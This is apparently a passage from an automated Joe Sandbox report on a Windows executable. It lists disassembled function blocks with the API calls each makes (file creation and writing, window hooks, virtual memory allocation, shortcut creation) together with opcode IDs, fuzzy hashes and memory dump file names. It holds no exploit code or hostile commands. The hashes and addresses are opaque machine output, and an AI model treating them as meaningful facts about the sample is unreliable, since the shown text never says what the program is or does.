                                                    • Instruction Fuzzy Hash: B0E086319042499FDF21DFD4D9023DDB771FF44368F10455BD96123292C7391890CA99
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 235564eec409229d97f816f215ca7c653443c75497c79a7b64e69b3d441639b0
                                                    • Instruction ID: e818be3151b219871231a97a865e02acf4b711aa7f8be8cd112908db7a22380f
                                                    • Opcode Fuzzy Hash: 235564eec409229d97f816f215ca7c653443c75497c79a7b64e69b3d441639b0
                                                    • Instruction Fuzzy Hash: 4D021874A0020A9FCF14DFA8C680AAEBBB5BF48314F14416EE855BB391DB34AD51CF95
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00409B3A
                                                      • Part of subcall function 0040AC38: __EH_prolog.LIBCMT ref: 0040AC3D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 2178e9eba65f95c9888116d06e9ba07af3601df2b0461c21cca6b67b8162f411
                                                    • Instruction ID: 5c441e7a216b12d446c8107e1bef11311747ec2156c2b6c2d54135c0d6f242e7
                                                    • Opcode Fuzzy Hash: 2178e9eba65f95c9888116d06e9ba07af3601df2b0461c21cca6b67b8162f411
                                                    • Instruction Fuzzy Hash: C921C130A012059FDB25DF65C484F9EBBB4BF04304F0440AEE909AB292CB38EE40CB94
                                                    APIs
                                                    • SetFileAttributesW.KERNELBASE(?,?), ref: 00402407
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: cde5d9bb005f108667f2f393147311b5deea907668607deb29ecae9b359384cc
                                                    • Instruction ID: 1547520d6acc2d98160fec4895152a320b2b160caaaf5443f345e02eba4257ae
                                                    • Opcode Fuzzy Hash: cde5d9bb005f108667f2f393147311b5deea907668607deb29ecae9b359384cc
                                                    • Instruction Fuzzy Hash: BDF037312007049FC7249F69D948B57B3F4BF04305F00892EE886A6AA0D3B8E989CF98
                                                    APIs
                                                    • SysAllocStringLen.OLEAUT32(00000000,?), ref: 0040EEFF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: AllocString
                                                    • String ID:
                                                    • API String ID: 2525500382-0
                                                    • Opcode ID: 47a9cef0b716d5d9b8e0ec5851d3607f6657cac8c1bbded9b40d4ae61b7cb4e9
                                                    • Instruction ID: 3da992b2f295af5ce21afc0a717871a74e5234c07e45486ad5bc5640170ddcfd
                                                    • Opcode Fuzzy Hash: 47a9cef0b716d5d9b8e0ec5851d3607f6657cac8c1bbded9b40d4ae61b7cb4e9
                                                    • Instruction Fuzzy Hash: 89E08C3628430DABE7008FA4E84070137A8AF44328F20C0AAE60CCE3A1E673C4418705
                                                    APIs
                                                      • Part of subcall function 0040D16E: CloseHandle.KERNEL32(?,?,0040D198,?,?,0040D266,?,80000000,?,00000003,00000080,?,0040D223,?,00000000), ref: 0040D178
                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,?,0040D266,?,80000000,?,00000003,00000080), ref: 0040D1AF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateFileHandle
                                                    • String ID:
                                                    • API String ID: 3498533004-0
                                                    • Opcode ID: 1bbb841870762bc1c1e414dd06521c7f091a5e84fde9cd7fad7ba1c582b794b3
                                                    • Instruction ID: fee09c1f426cd636a184300f872697c070953ccbdfa0d046d13213d19b7ff1de
                                                    • Opcode Fuzzy Hash: 1bbb841870762bc1c1e414dd06521c7f091a5e84fde9cd7fad7ba1c582b794b3
                                                    • Instruction Fuzzy Hash: C5E0EC32440219BBCF215FE49C02FCA3F6AAF05770F148626FA546A1E1CB76D870AB94
                                                    APIs
                                                    • WriteFile.KERNELBASE(?,?,00000001,00000001,00000000,?,0040D3AB,?,00000001,00000000,?,?,00000000,?,?,0040D753), ref: 0040D3F1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: FileWrite
                                                    • String ID:
                                                    • API String ID: 3934441357-0
                                                    • Opcode ID: 4127b395853accabd2e5465692d083ea8a97eb870675eded0bf61330bd7facb8
                                                    • Instruction ID: 8af7ede27650476760748d8f0974da74e75692923cad712dfaf754e07b4b19fe
                                                    • Opcode Fuzzy Hash: 4127b395853accabd2e5465692d083ea8a97eb870675eded0bf61330bd7facb8
                                                    • Instruction Fuzzy Hash: 5AE0EE31200209EFEB00CF50D881FAA37EAEB98720F50C128E9184A220C731EA21CF88
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040D280
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: cd838928126058c2c8b2a636a48f166ca248dfecea264441a67339c135919567
                                                    • Instruction ID: 306e40f79ff7d164134fc1a6269841cf36d0734ccbdcc09d557759cec589b085
                                                    • Opcode Fuzzy Hash: cd838928126058c2c8b2a636a48f166ca248dfecea264441a67339c135919567
                                                    • Instruction Fuzzy Hash: 25E0E236240208FFDB01CF90CC42FDEBBBAFB09314F208068E90596260C775AA24EB54
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 43ffabbfe514dbf4d1133dd9f1f3e7bf2f97be2d10b4e08b2d8a3314a2d07d0a
                                                    • Instruction ID: 38bc7f760aa6b3076ab140ed16226002fb98438f22e958dd4e8afeecd2fcf9db
                                                    • Opcode Fuzzy Hash: 43ffabbfe514dbf4d1133dd9f1f3e7bf2f97be2d10b4e08b2d8a3314a2d07d0a
                                                    • Instruction Fuzzy Hash: F3C012B1411114BBD7005B968806ADF7A7CDF01369F05451EB00063141C7BC9E4146FA
                                                    APIs
                                                    • SetFileTime.KERNELBASE(?,00000000,00000000,?,?,004023EA,?), ref: 0040D373
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: FileTime
                                                    • String ID:
                                                    • API String ID: 1425588814-0
                                                    • Opcode ID: bac2da2bfcccfcae6f9c2c353ab7bee9ebe29119db37a6ba71e2867168e47a0c
                                                    • Instruction ID: ca77b6d02caa7ed7f3242838f1bdd2aee9a02485bc02e7d56acfa8784285b47f
                                                    • Opcode Fuzzy Hash: bac2da2bfcccfcae6f9c2c353ab7bee9ebe29119db37a6ba71e2867168e47a0c
                                                    • Instruction Fuzzy Hash: D3C04C31280318B7D6111AA2DC06F857B5DAB11B50F10C025B604585B1D662A470AA59
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID:
                                                    • API String ID: 1452528299-0
                                                    • Opcode ID: f06f2ed0a0a52337a91e070dedfdbb512f8aaae1242cd9204ce51c8f897c205a
                                                    • Instruction ID: 49439f3755443ca4daedc7ce2aa9e15476dac3a8f321418512abce0645eeaede
                                                    • Opcode Fuzzy Hash: f06f2ed0a0a52337a91e070dedfdbb512f8aaae1242cd9204ce51c8f897c205a
                                                    • Instruction Fuzzy Hash: 7401AD35A00516EBCB14CE94C9009ABB775BF46354B10493AAC0AAB390D73AED06DBD8
                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,?,0040C32F,?), ref: 0040C359
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 582c648b8839900d5345e01be33458bd1fd7a318027582ea914fbc4fff975b15
                                                    • Instruction ID: 60fc05ea96e579318a1b7a11e861cd9910d93ad6900d9886fe920b821d4e3c39
                                                    • Opcode Fuzzy Hash: 582c648b8839900d5345e01be33458bd1fd7a318027582ea914fbc4fff975b15
                                                    • Instruction Fuzzy Hash: 98C0123128420CEBEB100BD4EC86BE53A989708BAAF40C021FB0C684D0D2B1A0A08698
                                                    APIs
                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,0040C33D,?), ref: 0040C374
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: FreeVirtual
                                                    • String ID:
                                                    • API String ID: 1263568516-0
                                                    • Opcode ID: 72ea4c8a59593272f5669ecaf9d79730d52e98609149601b2796f29e9bbec680
                                                    • Instruction ID: e6744d43e18db1d2c52cc6761727822990cd303ec9133c303e5c13806bbf2fd9
                                                    • Opcode Fuzzy Hash: 72ea4c8a59593272f5669ecaf9d79730d52e98609149601b2796f29e9bbec680
                                                    • Instruction Fuzzy Hash: 09C04C30180608E7DB211B54DC49BD93A58A705756F50C121BA0D285E0D7B565D4DA88
                                                    APIs
                                                    • SystemParametersInfoW.USER32(00000029,00000000,000001F4,00000000), ref: 004074C1
                                                    • GetDC.USER32(00000000), ref: 004074CC
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004074D7
                                                    • MulDiv.KERNEL32(?,00000048,00000000), ref: 004074E6
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 004074F4
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040751C
                                                    • FindResourceA.KERNEL32(00000000,?,00000005), ref: 00407531
                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 0040753D
                                                    • LockResource.KERNEL32(00000000), ref: 00407548
                                                    • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_00007224), ref: 00407566
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: Resource$CapsDeviceDialogFindHandleIndirectInfoLoadLockModuleParamParametersReleaseSystem
                                                    • String ID:
                                                    • API String ID: 1373584218-0
                                                    • Opcode ID: 3a05be7e687ef5f13c10972e9a2e067480196be0dd54add7a9c6104d58a54cc0
                                                    • Instruction ID: 737d20d5fbffcab560bb8a7c5625c9b578bc60d9d11df34ce8b9be94154be4c5
                                                    • Opcode Fuzzy Hash: 3a05be7e687ef5f13c10972e9a2e067480196be0dd54add7a9c6104d58a54cc0
                                                    • Instruction Fuzzy Hash: 7C219275980214BBE7215B659C88EFB7B7CEF49745F0040B9F905E2190D7748E81CB69
                                                    APIs
                                                    • wvsprintfW.USER32(?,00000000,?), ref: 004072A4
                                                    • GetLastError.KERNEL32(?,0000FDE9,00000000), ref: 004072B4
                                                    • FormatMessageW.KERNEL32(00001100,00000000,00000000,?,00000000,00000000,00000000,?,0000FDE9,00000000), ref: 004072DC
                                                    • FormatMessageW.KERNEL32(00001100,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,0000FDE9,00000000), ref: 004072F3
                                                    • lstrlenW.KERNEL32(?,?,00000000,00000000,00000000,?,0000FDE9,00000000), ref: 00407306
                                                    • lstrlenW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0000FDE9,00000000), ref: 0040730D
                                                    • lstrcpyW.KERNEL32(00000000,?), ref: 00407339
                                                    • lstrcpyW.KERNEL32(00000002,00000000), ref: 0040734C
                                                    • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000000,?,0000FDE9,00000000), ref: 0040735F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: FormatMessagelstrcpylstrlen$ErrorFreeLastLocalwvsprintf
                                                    • String ID:
                                                    • API String ID: 4146474141-0
                                                    • Opcode ID: c4c6f2645e1b96947871e3855a4fc841a8b729d484be1055ea2a0a3ad07fc35f
                                                    • Instruction ID: c739b55adc4babb88fe741c80129b540444c3db086f1027a464c67691b66768b
                                                    • Opcode Fuzzy Hash: c4c6f2645e1b96947871e3855a4fc841a8b729d484be1055ea2a0a3ad07fc35f
                                                    • Instruction Fuzzy Hash: EE2175B294410CBEEB159FA0DC85DEB7BACEB04394F10807BF905D6190EA34AE54DBA5
                                                    APIs
                                                    • _wtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 004027D7
                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000019,00000000), ref: 00402877
                                                    • _wtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,?), ref: 00402932
                                                    • CoCreateInstance.OLE32(0041E900,00000000,00000001,0041E8D0,?,.lnk,?), ref: 004029DB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: _wtol$CreateFolderInstancePathSpecial
                                                    • String ID: .lnk
                                                    • API String ID: 3412909311-24824748
                                                    • Opcode ID: 59ca3bc934bfe5524fd71030fef388c7fb6b0ecd844532260d109d37369cbdbc
                                                    • Instruction ID: f710f02e0929a294d06bc30e2871665e4811290be6e082897783be63a7fbe6f3
                                                    • Opcode Fuzzy Hash: 59ca3bc934bfe5524fd71030fef388c7fb6b0ecd844532260d109d37369cbdbc
                                                    • Instruction Fuzzy Hash: 25A17C76900209AFDB14EBA1CD89AEE77B9EF04304F10443EF505B61E1EB79AD52DB18
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00406756
                                                    • SetWindowsHookExW.USER32(00000007,Function_000075F2,00000000,00000000), ref: 00406766
                                                    • GetCurrentThreadId.KERNEL32 ref: 0040677A
                                                    • SetWindowsHookExW.USER32(00000002,Function_000075C3,00000000,00000000), ref: 0040678A
                                                    • EndDialog.USER32(?,00000000), ref: 004067B5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: CurrentHookThreadWindows$Dialog
                                                    • String ID:
                                                    • API String ID: 1967849563-0
                                                    • Opcode ID: 2c775c8deca40f438bef2d2cbe565d8ac4cf06de5fd7fe09e23dca1ec634e25c
                                                    • Instruction ID: 25a4db72bee226b3d1d669d7668e4e2c4ea3b9f7c17e18db64053bbd3cc309ad
                                                    • Opcode Fuzzy Hash: 2c775c8deca40f438bef2d2cbe565d8ac4cf06de5fd7fe09e23dca1ec634e25c
                                                    • Instruction Fuzzy Hash: FCF03C74A80320EFE7209B90EC89BA576A4A758705F50807BE607D15F1CBB819D1DF5E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: [6A$[6A$[6A
                                                    • API String ID: 0-2956743508
                                                    • Opcode ID: 302932b089df34dade02cb092ad0424b9b2189065354e33b2688753d6745557a
                                                    • Instruction ID: ab9a170a832cc4644c16837fa02db854190e54fda33e4070c35fc96ce6bc9187
                                                    • Opcode Fuzzy Hash: 302932b089df34dade02cb092ad0424b9b2189065354e33b2688753d6745557a
                                                    • Instruction Fuzzy Hash: BDF22172F101298FCB18CFADC9806ACBBF1FF49341F15426AE855E7384E6789A52CB54
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: g\A$g\A$g\A
                                                    • API String ID: 0-541483765
                                                    • Opcode ID: 0506bd1424bbf784d0aa033c801f942a4681b14449226da892feb2b050152ce0
                                                    • Instruction ID: 52fda566a3b8c3631fdaaf90d589631f16f8e6362a90c72a2b53d4c11cc329a8
                                                    • Opcode Fuzzy Hash: 0506bd1424bbf784d0aa033c801f942a4681b14449226da892feb2b050152ce0
                                                    • Instruction Fuzzy Hash: CA616D79900646DFCB15CF6CC4809EAFBF1FF49304B19819EE895DB341E639A982CB94
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001B0FB,0041A916), ref: 0041B0F4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 1561773e955de58207edc186e1e6ac9a6a1f4d3db6c42ee5d93cea4427833907
                                                    • Instruction ID: 8253ac15410e5078740fa1fe0e8c6fd17a7701e4542fa8e97002f3b533f6e886
                                                    • Opcode Fuzzy Hash: 1561773e955de58207edc186e1e6ac9a6a1f4d3db6c42ee5d93cea4427833907
                                                    • Instruction Fuzzy Hash:
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b05532998844e7b030d05f987acda7d9849a42490bb64f13068762cae89e512d
                                                    • Instruction ID: 9125a28887f914b34898282b5ce049272f06258eac328e5c2ed0f1af334f46a0
